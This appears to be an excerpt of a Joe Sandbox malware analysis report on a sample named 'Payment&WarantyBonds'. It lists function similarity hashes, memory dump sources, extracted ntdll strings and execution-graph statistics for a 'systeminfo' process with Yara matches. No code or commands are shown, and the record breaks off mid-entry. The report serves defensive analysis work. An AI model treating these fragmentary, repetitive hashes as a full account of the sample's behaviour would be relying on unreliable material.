                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2a21e88b4a19c271d63d09673ede2da9797464b1a6f8623672360e017f4b1eae
                                                                                                                                                                                • Instruction ID: 2f9be6c9944ba42bee3fb1996de354db7a92126f0f4829adb8274050c5bf2fb1
                                                                                                                                                                                • Opcode Fuzzy Hash: 2a21e88b4a19c271d63d09673ede2da9797464b1a6f8623672360e017f4b1eae
                                                                                                                                                                                • Instruction Fuzzy Hash: CB012CB0E0020ADFDB04DFA9D545B9EF7F4FF18304F14827AA519EB391EA349A458B91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 546770970305d316d2c5a98994e9158fda362db2cdfc0e12f3ba9857f3860844
                                                                                                                                                                                • Instruction ID: e3bc83f37d788dd39f9ddd4fe72083ec05449a7fb646dc37efaf0fd234269773
                                                                                                                                                                                • Opcode Fuzzy Hash: 546770970305d316d2c5a98994e9158fda362db2cdfc0e12f3ba9857f3860844
                                                                                                                                                                                • Instruction Fuzzy Hash: B90181702406859BF7729B3CDD58B263BA8BB55B48F9A0596BA01CB6F6D778D4028210
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                                • Instruction ID: 360faa03e27e653314ae2b38e21ad26c98f4bcc64372fbbc47ac3961dff18f98
                                                                                                                                                                                • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                                • Instruction Fuzzy Hash: BDF0E93934191347EBB5AA2F8930B2FAA559FE0D11B0D062F9501CB7B0DF30DC118790
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8904caabf9ce7f0fa6fb6549d42dbf8f913102b9e1e2bc0634f5e091b9493944
                                                                                                                                                                                • Instruction ID: ab1edef90b12dcb3faeae76e64b13a0670ecb13da152e2267af8373959f8d410
                                                                                                                                                                                • Opcode Fuzzy Hash: 8904caabf9ce7f0fa6fb6549d42dbf8f913102b9e1e2bc0634f5e091b9493944
                                                                                                                                                                                • Instruction Fuzzy Hash: 6EF0AF70A00249AFCF04EFA9D505A9EB7F4FF28300F40406AB905EB391D634DA05CB54
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 07c932e5fc5ce128f569b1f72c0a143e82d6a61c6f70b62f0124246d1eb89153
                                                                                                                                                                                • Instruction ID: 7bf7f002f2f1ed81cb50ec6f2a686e8795ac7c9bf5f55bf86369def057d65755
                                                                                                                                                                                • Opcode Fuzzy Hash: 07c932e5fc5ce128f569b1f72c0a143e82d6a61c6f70b62f0124246d1eb89153
                                                                                                                                                                                • Instruction Fuzzy Hash: B1F0F032100244ABD7329B4ACC08F9BBBEDEF98714F08011EE542831A0C6B0A908C650
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 10e4e67b90e91ac78f271524cdad4ff838407a503b6adbbabcfd18d34479670f
                                                                                                                                                                                • Instruction ID: 14f8c07083d6d61e81949df9310a90c6940bea30c063ff999cb6054832793570
                                                                                                                                                                                • Opcode Fuzzy Hash: 10e4e67b90e91ac78f271524cdad4ff838407a503b6adbbabcfd18d34479670f
                                                                                                                                                                                • Instruction Fuzzy Hash: 4FF04F74A00249AFDB04EFA9E545A9EB7F4FF28304F10445AB919EB390D674DA01CB55
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a2b2c6c0f96234f25602c470e6940f38152a6cbe04f585d33c468bfb264f1fae
                                                                                                                                                                                • Instruction ID: cfe706a521492e392e9b2b88c333810f424ee6a4db5da40b67b9a0b8651a787a
                                                                                                                                                                                • Opcode Fuzzy Hash: a2b2c6c0f96234f25602c470e6940f38152a6cbe04f585d33c468bfb264f1fae
                                                                                                                                                                                • Instruction Fuzzy Hash: 24F0A76651568107DF335B2C74683D2BBA5AB52510F1B148FE4B15F329C6F5C887D324
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fea95e75082e3e0614b26b283a395d8e6358156f99a8ae45d1b5aedfe1aeeb1c
                                                                                                                                                                                • Instruction ID: c9417ab60ec89f894e7651d4360b173d90e79b08d82d2fced23b59b7a33c7d5d
                                                                                                                                                                                • Opcode Fuzzy Hash: fea95e75082e3e0614b26b283a395d8e6358156f99a8ae45d1b5aedfe1aeeb1c
                                                                                                                                                                                • Instruction Fuzzy Hash: 18F05470A1024D9FDB04EF79D545A5EB7B8EF58304F10805AE605EB391DA74D9058B15
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d0d2a2b71f1af38ad25b475c2311a7b646f4bd1788afa56b34dfd94e37592209
                                                                                                                                                                                • Instruction ID: 7a95a3e6c40ca5ea548c6db1e50bc692996bef25729a742025a70b87be747ddf
                                                                                                                                                                                • Opcode Fuzzy Hash: d0d2a2b71f1af38ad25b475c2311a7b646f4bd1788afa56b34dfd94e37592209
                                                                                                                                                                                • Instruction Fuzzy Hash: D7F0E270A10249AFDB04EFBAE505E6EB7F8FF28304F04405EA901EB3A0EA74D901CB14
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5873487d65dd2bd19c60ef06bc49bd55d4ad46b700fc67656536c2d9bb4f08af
                                                                                                                                                                                • Instruction ID: cd192ae8651c287466c817e8bf84bc78c3bae05f0c59bd9f47b56d08f4519da7
                                                                                                                                                                                • Opcode Fuzzy Hash: 5873487d65dd2bd19c60ef06bc49bd55d4ad46b700fc67656536c2d9bb4f08af
                                                                                                                                                                                • Instruction Fuzzy Hash: 96F0BE74A10249ABDB04EFA9E505AAEB7F8BF28304F01445EB901EB3A1EA34D9018B50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fd65a07ce24a6873c541d3bc373c84e828ff0106dc165ffb08e16b14036ed52c
                                                                                                                                                                                • Instruction ID: 8f12afb9f7dd71e6442bb69fe4c24c3072ff1d4683de0b5e60707e0a05c9790a
                                                                                                                                                                                • Opcode Fuzzy Hash: fd65a07ce24a6873c541d3bc373c84e828ff0106dc165ffb08e16b14036ed52c
                                                                                                                                                                                • Instruction Fuzzy Hash: 22E0C2332004606BC322FF6EDD00F4A739EEFB4270F45022AF1558B2A0CAB4AC40C794
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 83ba1a18b824efdfb8a9e4eeb1d2098b17a98ef67856aef4c8714b312f6efd74
                                                                                                                                                                                • Instruction ID: 8ad7646469b5b002306717a10608931348e0d9fdf46ac8bdcc0be29ef0fb03b8
                                                                                                                                                                                • Opcode Fuzzy Hash: 83ba1a18b824efdfb8a9e4eeb1d2098b17a98ef67856aef4c8714b312f6efd74
                                                                                                                                                                                • Instruction Fuzzy Hash: A3F0C935251B80CBF62ADF08C1A1B5177B9F755B44F910459D4464FBA1C73A9942DB40
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                                                                                                                                                • Instruction ID: 66b0a1248900a41f167f760a24be3206002e97239bf56c2281ce8e30cebc7965
                                                                                                                                                                                • Opcode Fuzzy Hash: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                                                                                                                                                • Instruction Fuzzy Hash: 08D02E32022620AFC7323F26EE00F833AB5EFB0B10F04002EB001264F086B0EC80C690
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                                • Instruction ID: 9f8d1217b22d9e481da9f5fb1d207726a3bc9fca9a52a75a9f8e30e51e2beba2
                                                                                                                                                                                • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                                • Instruction Fuzzy Hash: 58D0A933204620ABDB32AA1DFC00FC333E8BB9C720F06089EB008C7160C374AC81CA84
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                                • Instruction ID: 77c9f615573fb04996573f18dbcc86e41979947781530e45285648dc0c91f35d
                                                                                                                                                                                • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                                • Instruction Fuzzy Hash: B7D022332130B093CB285A566900F636D05ABC0AA0F2A002E340A93924C0288C43C2E0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                                • Instruction ID: f071a15fc289585a890c766d60fac35107779a074ff121d55620e34128f1d3f5
                                                                                                                                                                                • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                                • Instruction Fuzzy Hash: F6D0C935212E80CFD61BCB0CC5A4F1633A8BB88B44F850591F401CBB32D67CDD40CA00
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                                                                                                                • Instruction ID: 34c5f946ac10d20fb311e8363482f6fd36df0a432225c5fbf735ad85ce60d8cb
                                                                                                                                                                                • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                                                                                                                • Instruction Fuzzy Hash: 18D01739941AC48FE72BCB08C165B917BF4F719B44FC61099E0424BBA2C27C9984CB00
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                • Instruction ID: 2c3ae73593acde9cc35406a8f7a04fa278982bd79f2a1cedea0875d21b264bc9
                                                                                                                                                                                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                • Instruction Fuzzy Hash: 73D01236100248EFCB01DF41C890D9A7B2AFBD8710F108019FD19076108A31ED62DA50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                                                                                                                                                • Instruction ID: 8d9b4745c2ac6a8dbc547b5b1cd87a8b8a239159df4dd5193a74c591b1cad74d
                                                                                                                                                                                • Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                                                                                                                                                • Instruction Fuzzy Hash: 77C08C791415916BFB2B9F05C900B2A7A50BB14AA6F8401ADAB40295B2C37C98028218
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                                • Opcode ID: 20cdd772f2ec0a9f3e1b961e164b267f392f339a2cf229f44ee0665facadf5b8
                                                                                                                                                                                • Instruction ID: b8006cddcf04347b0d2a17a02805051ad7e2b369b2637d3c591a99c7fb3d4af1
                                                                                                                                                                                • Opcode Fuzzy Hash: 20cdd772f2ec0a9f3e1b961e164b267f392f339a2cf229f44ee0665facadf5b8
                                                                                                                                                                                • Instruction Fuzzy Hash: 0751F3B2B00116BFCB11DF9D8880D7EFBB8BB59244714C22BE469D3651D374DE048BA1
                                                                                                                                                                                Strings
                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01494787
                                                                                                                                                                                • Execute=1, xrefs: 01494713
                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014946FC
                                                                                                                                                                                • ExecuteOptions, xrefs: 014946A0
                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01494655
                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01494742
                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01494725
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                • Opcode ID: 458e1fbe02e6346d4d1377ea602778df2d4be8816e3068266eda712b9adf81dc
                                                                                                                                                                                • Instruction ID: ad862b95476a79597cd59283b52feabcdb34cad104b4705bda3ac57ed64bc6cb
                                                                                                                                                                                • Opcode Fuzzy Hash: 458e1fbe02e6346d4d1377ea602778df2d4be8816e3068266eda712b9adf81dc
                                                                                                                                                                                • Instruction Fuzzy Hash: E95160316002097ADF119B95EC85FAE7BACAF24315F5400BFD909A72B1D770DE468F61
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                • String ID: +$-$0$0
                                                                                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                                                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                • Instruction ID: 4b2cc6140c5775eef3be87593ccc589b279aba2cebb399959635c9f03f7b5fb4
                                                                                                                                                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                • Instruction Fuzzy Hash: 3B81C070F0524A8EEF258E6CC8517FEBBA9EF55328F18411BD955E73A1C73888418B63
                                                                                                                                                                                Strings
                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 01497BAC
                                                                                                                                                                                • RTL: Resource at %p, xrefs: 01497B8E
                                                                                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01497B7F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                • API String ID: 0-871070163
                                                                                                                                                                                • Opcode ID: 5121ad276460454366262617096d81c69e000ebdd96ef3c928c5204a1c24d548
                                                                                                                                                                                • Instruction ID: edb61785349b45b18308091a3b433f6f66dee57a9200fbf13a09f5e64d699d43
                                                                                                                                                                                • Opcode Fuzzy Hash: 5121ad276460454366262617096d81c69e000ebdd96ef3c928c5204a1c24d548
                                                                                                                                                                                • Instruction Fuzzy Hash: CB41E4327007029FDB21CE29C850B6BB7E6EF98725F100A1EEA56D77A1D771E405CB91
                                                                                                                                                                                APIs
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0149728C
                                                                                                                                                                                Strings
                                                                                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01497294
                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 014972C1
                                                                                                                                                                                • RTL: Resource at %p, xrefs: 014972A3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                • API String ID: 885266447-605551621
                                                                                                                                                                                • Opcode ID: 84e5fce5f572011186dcd55e33d26953b5b1729a96b230fb6e831cad8339abf3
                                                                                                                                                                                • Instruction ID: 94107e2cb21baea99dc55c79cdd568d767a056325145833b163275f22a372813
                                                                                                                                                                                • Opcode Fuzzy Hash: 84e5fce5f572011186dcd55e33d26953b5b1729a96b230fb6e831cad8339abf3
                                                                                                                                                                                • Instruction Fuzzy Hash: FF411431610206ABCB21CF25CC41B6ABBA5FF65715F10062EFD559B361DB31E8068BD1
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                • String ID: +$-
                                                                                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                                                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                • Instruction ID: 37bd394eea8d88816a25c54c08051276187826e2c53e13ea3d3ec9271bb9d17d
                                                                                                                                                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                • Instruction Fuzzy Hash: 6791D370E002069BEB28CF6DC890ABFBBA9EF5472EF14451BE955E73E0D73489418712
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $$@
                                                                                                                                                                                • API String ID: 0-1194432280
                                                                                                                                                                                • Opcode ID: 9bb98da2bc9bc25e18f3757afe47c089ece8a59f8cc3465ec7f78b9887038825
                                                                                                                                                                                • Instruction ID: 2e8e88c5259bba616b4415033769b9e5ce8397c1ecab7ef3ef95763b0505ed94
                                                                                                                                                                                • Opcode Fuzzy Hash: 9bb98da2bc9bc25e18f3757afe47c089ece8a59f8cc3465ec7f78b9887038825
                                                                                                                                                                                • Instruction Fuzzy Hash: E0812871D002799BDB319B54CC44BEEBAB8AF48714F0441EBEA19B7250D7709E85CFA0

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:2.6%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:4.3%
                                                                                                                                                                                Signature Coverage:2.3%
                                                                                                                                                                                Total number of Nodes:440
                                                                                                                                                                                Total number of Limit Nodes:74

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 9$z$#'$'l$'y$GK$NW$~H$4$w
                                                                                                                                                                                • API String ID: 0-783608958
                                                                                                                                                                                • Opcode ID: d5d30b173a49d141839cfefe32fcb7956afdf7be81d290523b2858bd30e4f758
                                                                                                                                                                                • Instruction ID: 7eb035da9858f937dd661048e74af006991eda2d2bd90c54e965e6d481068aa8
